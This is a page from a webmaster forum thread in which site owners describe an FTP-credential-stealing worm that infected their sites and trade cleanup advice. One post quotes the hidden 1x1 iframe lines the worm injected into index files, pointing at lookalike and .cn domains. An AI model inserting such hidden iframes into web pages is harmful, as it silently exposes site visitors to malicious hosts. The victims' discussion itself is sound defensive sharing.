Welcome guest, is this your first visit? Create Account now to join.
  • Login:

Members in Chat:
+ Reply to Thread
Page 64 of 148 FirstFirst ... 1454626364656674114 ... LastLast
Results 631 to 640 of 1476
  1. #631
    Hellas's Avatar
    Hellas is offline Very Unusual Member Recent Blog:
    Join Date
    Dec 2008
    Location
    Bosnia
    Posts
    1,311
    $NetBucks
    4,383
    Thanked 292 Times in 205 Posts
    Quote Originally Posted by DomainMagnate View Post
    Hellas, what does the worm do?
    First your pc get infected. Then it watchs for your username and pass for ftp (i believe when you initiate connection then it get it, not by type in).
    Then it add few lines to every file on server that contain in name index, main
    but I found it in some unrelated files. That files are pointed to some chinese or another sites ads or something not sure.

    Here is the lines it add:

    echo "<iframe src=\"http://goooogleadsence.biz/?click=B16BFB\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

    echo "<iframe src=\"http://google-ana1yticz.com/?click=38951B\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

    and another one
    <iframe src="http://cutlot.cn/in.cgi?income49" width=1 height=1 style="visibility: hidden"></iframe>

    I have one big site with over 600 index files, and I am still finding the way for removing them all. Wordpress sites are very easy to clean, but I noticed it infect few other site not just index. Some guys on joomla are selling removal tools. My Clam antivirus detects all on server but it can not repair files, just delete them, so you need to manualy remove those.

    And it looks like permissions did not stop him. Every file that I (my ftp user) had right to write, are infected.

    Bad thing is if you dont react google wil designate your site as "This site can harm your computer". You can imagine what that would do to your site traffic.
    Is he a robot? Is he made of jello? The world may never know! - Destinations Point

  2. #632
    Join Date
    Mar 2009
    Location
    SEO-Peace.com.. 18 and half hours of the day :p
    Posts
    459
    $NetBucks
    1,238
    Blog Entries
    2
    Thanked 146 Times in 95 Posts
    I'm fed cleaning them. It has infected most of my sites. And looks like.. the only job is to clean clean clean.. damn.. leave everything and clean this..

    Quote Originally Posted by Hellas View Post
    today 5 of my sites got infected by iframe ftp worm
    and among them sulumits retsambew
    I changed all my passwords and cleaned almost all...
    lost over 7 hours to fix them all...

    I see Sunitas entry is still infected. This worm is madness. I would strangle the guy who made it even if know that I am the guilty the most for not be more carefull.
    I was lucky to notice almost imediatly that something is wrong...

    Afzal it was some other directories I will check it when I log back to windows.
    But I think it were regular directories...

  3. #633
    DomainMagnate's Avatar
    DomainMagnate is offline Super-Duper Moderator Recent Blog: Save Money and Save the Internet!
    Join Date
    Dec 2008
    Posts
    739
    $NetBucks
    3,063
    Blog Entries
    2
    Thanked 173 Times in 108 Posts
    ouch! Well I usually just roll back the previous backup when the sites get hacked.

  4. #634
    Hellas's Avatar
    Hellas is offline Very Unusual Member Recent Blog:
    Join Date
    Dec 2008
    Location
    Bosnia
    Posts
    1,311
    $NetBucks
    4,383
    Thanked 292 Times in 205 Posts
    Quote Originally Posted by ChillingBreeze View Post
    I'm fed cleaning them. It has infected most of my sites. And looks like.. the only job is to clean clean clean.. damn.. leave everything and clean this..
    You need to clean your pc first then change all passwords then bring back your backups.
    There is no point to recover if you did not change backup it will just infect everything again.


    Quote Originally Posted by DomainMagnate View Post
    ouch! Well I usually just roll back the previous backup when the sites get hacked.
    That is what I did in small cases.




    Also strange thing is that I dont use FTP so often. But I use FTP layers in my PHP applications... So thats why I am worried that it can watch for everything typed in.
    So I changed all my system passwords.

    And as I said I was lucky to notice almost immediaty. My friend contacted me and said he is getting unusual warnings and just little bit earlier everything worked.

    I now work from my Mandriva installation, dont trust the XP + NOD 32. However NOD 32 noticed me and I mistakenly clicked close instead of terminate.

    Also this thing works only on some browsers

    IE FIREFOX and OPERA it looks it cant infect Chrome.
    Is he a robot? Is he made of jello? The world may never know! - Destinations Point

  5. #635
    Join Date
    Dec 2008
    Location
    Minneapolis
    Posts
    529
    $NetBucks
    1,740
    Thanked 75 Times in 53 Posts
    You could use a sed along with find to remove all instances of those lines in a whole directory structure if you have access to run sed/find (shell)
    Submit Your Proxies @ Proxy Sites.net

  6. #636
    Shawn's Avatar
    Shawn is offline Net Builder Recent Blog: Harvest Connections
    Join Date
    Dec 2008
    Location
    Dominican Republic
    Posts
    165
    $NetBucks
    550
    Thanked 25 Times in 22 Posts
    What browser did you use to open the infected site and what anti-virus are you running?

  7. #637
    Join Date
    Mar 2009
    Posts
    381
    $NetBucks
    1,144
    Blog Entries
    1
    Thanked 28 Times in 27 Posts
    My sulumits retsambew blog is lucky that it has not been affected by any virus. My wordpress blog also got suspended.

  8. #638
    Coastercraze's Avatar
    Coastercraze is offline Net Builder Legend
    Join Date
    Jan 2009
    Location
    Under powerlines
    Posts
    498
    $NetBucks
    1,667
    Blog Entries
    3
    Thanked 59 Times in 48 Posts
    Quote Originally Posted by sulumits competitior View Post
    My sulumits retsambew blog is lucky that it has not been affected by any virus. My wordpress blog also got suspended.
    Mr. Sulumits Retsambew has made it's way to the first page finally.
    Webmaster Forums
    Host Mist | Shared | Reseller | VPS | Dedicated
    Arcade Master - Rule the arcade!

  9. #639
    Hellas's Avatar
    Hellas is offline Very Unusual Member Recent Blog:
    Join Date
    Dec 2008
    Location
    Bosnia
    Posts
    1,311
    $NetBucks
    4,383
    Thanked 292 Times in 205 Posts
    Quote Originally Posted by nux View Post
    You could use a sed along with find to remove all instances of those lines in a whole directory structure if you have access to run sed/find (shell)
    I used clam antivirus to locate all instances then manuly removed them...
    Is he a robot? Is he made of jello? The world may never know! - Destinations Point

  10. #640
    Hellas's Avatar
    Hellas is offline Very Unusual Member Recent Blog:
    Join Date
    Dec 2008
    Location
    Bosnia
    Posts
    1,311
    $NetBucks
    4,383
    Thanked 292 Times in 205 Posts
    Is he a robot? Is he made of jello? The world may never know! - Destinations Point


 

Similar Threads

  1. Hello Net Builders!
    By GeeOne in forum Introduction Forum
    Replies: 9
    Last Post: 22 June, 2010, 02:36 AM
  2. Hello to Net Builders! :)
    By abientot in forum Introduction Forum
    Replies: 9
    Last Post: 1 October, 2009, 10:43 AM
  3. Replies: 4
    Last Post: 1 July, 2009, 18:37 PM
  4. Replies: 7
    Last Post: 28 February, 2009, 17:23 PM

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts